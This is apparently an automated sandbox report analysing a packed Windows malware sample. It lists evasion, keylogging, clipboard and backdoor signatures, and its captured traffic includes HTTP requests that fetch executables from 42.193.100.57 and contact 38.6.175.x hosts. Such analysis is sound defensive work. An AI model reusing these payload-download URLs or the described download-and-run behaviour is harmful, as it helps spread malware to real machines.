Windows Analysis Report
#U4fdd#U62a4#U795e1.exe

Overview

General Information

Sample name: #U4fdd#U62a4#U795e1.exe
renamed because original name is a hash value
Original sample name: 1.exe
Analysis ID: 1559170
MD5: f5b663e9aa9555b45bd9e88221083781
SHA1: 3df73ded0310c3e70ce430118ced5073f75e0cc1
SHA256: 2db7d9e24396db62672a83f5245a154a8b58d2099554aaa93ad2dcef1f18c513
Tags: exeopendiruser-Joker
Infos:

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Contains functionality to detect sleep reduction / modifications
Detected VMProtect packer
Machine Learning detection for dropped file
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file has a writeable .text section
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Contains functionality for read data from the clipboard
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May check if the current machine is a sandbox (GetTickCount - Sleep)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

barindex
Source: C:\Users\user\Desktop\ 16.exe ReversingLabs: Detection: 28%
Source: C:\Users\user\Desktop\update.exe ReversingLabs: Detection: 60%
Source: #U4fdd#U62a4#U795e1.exe ReversingLabs: Detection: 47%
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\Desktop\update.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\ 16.exe Joe Sandbox ML: detected
Source: #U4fdd#U62a4#U795e1.exe Joe Sandbox ML: detected
Source: #U4fdd#U62a4#U795e1.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004801E0 lstrcpyA,FindFirstFileA,GetLastError,SetLastError, 0_2_004801E0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004927A8 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 0_2_004927A8
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00423610 FindFirstFileA,FindClose, 0_2_00423610
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0041B240 FindNextFileA,FindClose,FindFirstFileA,FindClose, 0_2_0041B240
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00411EF0 FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose,SendMessageA, 0_2_00411EF0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004801E0 lstrcpyA,FindFirstFileA,GetLastError,SetLastError, 3_2_004801E0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004927A8 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 3_2_004927A8
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00423610 FindFirstFileA,FindClose, 3_2_00423610
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0041B240 FindNextFileA,FindClose,FindFirstFileA,FindClose, 3_2_0041B240
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00411EF0 FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose,SendMessageA, 3_2_00411EF0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_004929E2 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 7_2_004929E2
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00438DA0 FindNextFileA,FindClose,FindFirstFileA,FindClose, 7_2_00438DA0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0043BF10 FindFirstFileA,FindClose, 7_2_0043BF10
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0042FF90 FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose,SendMessageA, 7_2_0042FF90
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 4x nop then push esi 0_2_0041F502
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 4x nop then push esi 3_2_0041F502
Source: global traffic TCP traffic: 192.168.2.11:49711 -> 38.6.175.134:9901
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Tue, 23 Jul 2024 08:08:40 GMTAccept-Ranges: bytesETag: "db12387d7dcda1:0"Server: Microsoft-IIS/8.5Date: Wed, 20 Nov 2024 08:14:44 GMTContent-Length: 6123520Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 25 59 9f 66 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 a0 11 00 00 00 2b 00 00 00 00 00 fe 77 76 00 00 10 00 00 00 b0 11 00 00 00 40 00 00 10 00 00 00 10 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 a0 c5 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 98 c4 00 68 01 00 00 00 10 c5 00 b5 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 bd 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d6 9f 11 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 78 53 27 00 00 b0 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 e2 05 00 00 10 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6d 70 30 00 00 00 0a 36 29 00 00 00 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 76 6d 70 31 00 00 00 c0 c3 5c 00 00 40 68 00 00 d0 5c 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 72 73 72 63 00 00 00 b5 8b 00 00 00 10 c5 00 00 90 00 00 00 e0 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Tue, 23 Jul 2024 08:08:40 GMTAccept-Ranges: bytesETag: "db12387d7dcda1:0"Server: Microsoft-IIS/8.5Date: Wed, 20 Nov 2024 08:14:45 GMTContent-Length: 6123520Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 25 59 9f 66 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 a0 11 00 00 00 2b 00 00 00 00 00 fe 77 76 00 00 10 00 00 00 b0 11 00 00 00 40 00 00 10 00 00 00 10 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 a0 c5 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 98 c4 00 68 01 00 00 00 10 c5 00 b5 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 bd 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d6 9f 11 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 78 53 27 00 00 b0 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 e2 05 00 00 10 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6d 70 30 00 00 00 0a 36 29 00 00 00 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 76 6d 70 31 00 00 00 c0 c3 5c 00 00 40 68 00 00 d0 5c 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 72 73 72 63 00 00 00 b5 8b 00 00 00 10 c5 00 00 90 00 00 00 e0 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Tue, 23 Jul 2024 08:08:40 GMTAccept-Ranges: bytesETag: "db12387d7dcda1:0"Server: Microsoft-IIS/8.5Date: Wed, 20 Nov 2024 08:14:58 GMTContent-Length: 6123520Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 25 59 9f 66 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 a0 11 00 00 00 2b 00 00 00 00 00 fe 77 76 00 00 10 00 00 00 b0 11 00 00 00 40 00 00 10 00 00 00 10 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 a0 c5 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 98 c4 00 68 01 00 00 00 10 c5 00 b5 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 bd 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d6 9f 11 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 78 53 27 00 00 b0 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 e2 05 00 00 10 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6d 70 30 00 00 00 0a 36 29 00 00 00 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 76 6d 70 31 00 00 00 c0 c3 5c 00 00 40 68 00 00 d0 5c 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 72 73 72 63 00 00 00 b5 8b 00 00 00 10 c5 00 00 90 00 00 00 e0 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /%E5%8D%83%E5%8D%83%E6%99%9A%E6%98%9F16.exe HTTP/1.1Host: 42.193.100.57Cache-Control: no-cache
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.11:49702 -> 42.193.100.57:80
Source: global traffic HTTP traffic detected: GET /%E4%BF%9D%E6%8A%A4%E7%A5%9E.txt HTTP/1.1Accept: */*Referer: http://42.193.100.57/%E4%BF%9D%E6%8A%A4%E7%A5%9E.txtAccept-Language: zh-cnUser-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)Host: 42.193.100.57Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /%E4%BF%9D%E6%8A%A4%E7%A5%9E.txt HTTP/1.1Accept: */*Referer: http://42.193.100.57/%E4%BF%9D%E6%8A%A4%E7%A5%9E.txtAccept-Language: zh-cnUser-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)Host: 42.193.100.57Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: unknown TCP traffic detected without corresponding DNS query: 42.193.100.57
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004071EA InternetOpenUrlA,InternetReadFile, 0_2_004071EA
Source: global traffic HTTP traffic detected: GET /%E4%BF%9D%E6%8A%A4%E7%A5%9E.txt HTTP/1.1Accept: */*Referer: http://42.193.100.57/%E4%BF%9D%E6%8A%A4%E7%A5%9E.txtAccept-Language: zh-cnUser-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)Host: 42.193.100.57Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /%E5%8D%83%E5%8D%83%E6%99%9A%E6%98%9F16.exe HTTP/1.1User-Agent: Agent7207437Host: 42.193.100.57Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /%E5%8D%83%E5%8D%83%E6%99%9A%E6%98%9F16.exe HTTP/1.1Host: 42.193.100.57Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /%E4%BF%9D%E6%8A%A4%E7%A5%9E.txt HTTP/1.1Accept: */*Referer: http://42.193.100.57/%E4%BF%9D%E6%8A%A4%E7%A5%9E.txtAccept-Language: zh-cnUser-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)Host: 42.193.100.57Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /%E5%8D%83%E5%8D%83%E6%99%9A%E6%98%9F16.exe HTTP/1.1User-Agent: Agent7220484Host: 42.193.100.57Cache-Control: no-cache
Source: #U4fdd#U62a4#U795e1.exe String found in binary or memory: http://.httpsset-cookie:;;
Source: 16.exe, 00000004.00000002.1879881423.00000000005FB000.00000002.00000001.01000000.00000007.sdmp, 16.exe, 00000004.00000002.1882768972.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000007.00000002.1905145272.0000000002160000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000007.00000002.1905224498.00000000021A0000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000007.00000002.1904789983.0000000000660000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000007.00000002.1904789983.000000000067D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://38.6.175.25:901
Source: update.exe, 00000007.00000002.1904789983.0000000000660000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000007.00000002.1904226340.00000000001E0000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000007.00000002.1904789983.000000000067D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://38.6.175.25:901/down
Source: update.exe, 00000007.00000002.1904789983.000000000067D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://38.6.175.25:901/downLq
Source: update.exe, 00000007.00000002.1905145272.0000000002160000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000007.00000002.1905224498.00000000021A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://38.6.175.25:901/downhttp://38.6.175.25:901
Source: 16.exe, 00000004.00000002.1882225013.000000000134E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://38.6.175.25:901/downt
Source: update.exe, 00000007.00000002.1904789983.0000000000660000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://38.6.175.25:9018
Source: 16.exe, 00000004.00000003.1877794042.0000000002D51000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000007.00000002.1904789983.0000000000660000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000007.00000002.1904226340.00000000001E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://38.6.175.25:901C:
Source: #U4fdd#U62a4#U795e1.exe, 00000003.00000002.2714909833.0000000000666000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/
Source: #U4fdd#U62a4#U795e1.exe String found in binary or memory: http://42.193.100.57/%E4%BF%9D%E6%8A%A4%E7%A5%9E.txt
Source: #U4fdd#U62a4#U795e1.exe, 00000000.00000002.2714731411.00000000006E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/%E4%BF%9D%E6%8A%A4%E7%A5%9E.txt(
Source: #U4fdd#U62a4#U795e1.exe, 00000003.00000002.2714909833.000000000067C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/%E4%BF%9D%E6%8A%A4%E7%A5%9E.txt-U
Source: #U4fdd#U62a4#U795e1.exe, 00000000.00000002.2714731411.00000000006E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/%E4%BF%9D%E6%8A%A4%E7%A5%9E.txtKB-
Source: #U4fdd#U62a4#U795e1.exe, 00000000.00000002.2714731411.00000000006E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/%E4%BF%9D%E6%8A%A4%E7%A5%9E.txtSB5
Source: #U4fdd#U62a4#U795e1.exe, 00000000.00000002.2714731411.00000000006E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/%E4%BF%9D%E6%8A%A4%E7%A5%9E.txtY
Source: #U4fdd#U62a4#U795e1.exe, 00000000.00000002.2714731411.0000000000743000.00000004.00000020.00020000.00000000.sdmp, #U4fdd#U62a4#U795e1.exe, 00000003.00000002.2714909833.000000000063E000.00000004.00000020.00020000.00000000.sdmp, #U4fdd#U62a4#U795e1.exe, 00000003.00000002.2714909833.000000000067C000.00000004.00000020.00020000.00000000.sdmp, ???[1].txt.0.dr, ???[1].txt.3.dr String found in binary or memory: http://42.193.100.57/%E5%8D%83%E5%8D%83%E6%99%9A%E6%98%9F16.exe
Source: #U4fdd#U62a4#U795e1.exe, 00000000.00000002.2714731411.0000000000729000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/%E5%8D%83%E5%8D%83%E6%99%9A%E6%98%9F16.exe#
Source: #U4fdd#U62a4#U795e1.exe, 00000003.00000002.2714909833.000000000067C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/%E5%8D%83%E5%8D%83%E6%99%9A%E6%98%9F16.exe(
Source: #U4fdd#U62a4#U795e1.exe, 00000003.00000002.2714909833.000000000067C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/%E5%8D%83%E5%8D%83%E6%99%9A%E6%98%9F16.exe1Z
Source: #U4fdd#U62a4#U795e1.exe, 00000003.00000002.2714909833.000000000063E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/%E5%8D%83%E5%8D%83%E6%99%9A%E6%98%9F16.exe7
Source: #U4fdd#U62a4#U795e1.exe, 00000000.00000002.2714731411.0000000000743000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/%E5%8D%83%E5%8D%83%E6%99%9A%E6%98%9F16.exe=2
Source: #U4fdd#U62a4#U795e1.exe, 00000000.00000002.2714731411.0000000000743000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/%E5%8D%83%E5%8D%83%E6%99%9A%E6%98%9F16.exeN2
Source: #U4fdd#U62a4#U795e1.exe, 00000000.00000002.2714731411.0000000000743000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/%E5%8D%83%E5%8D%83%E6%99%9A%E6%98%9F16.exec3
Source: #U4fdd#U62a4#U795e1.exe, 00000003.00000002.2714909833.000000000067C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://42.193.100.57/%E5%8D%83%E5%8D%83%E6%99%9A%E6%98%9F16.execY
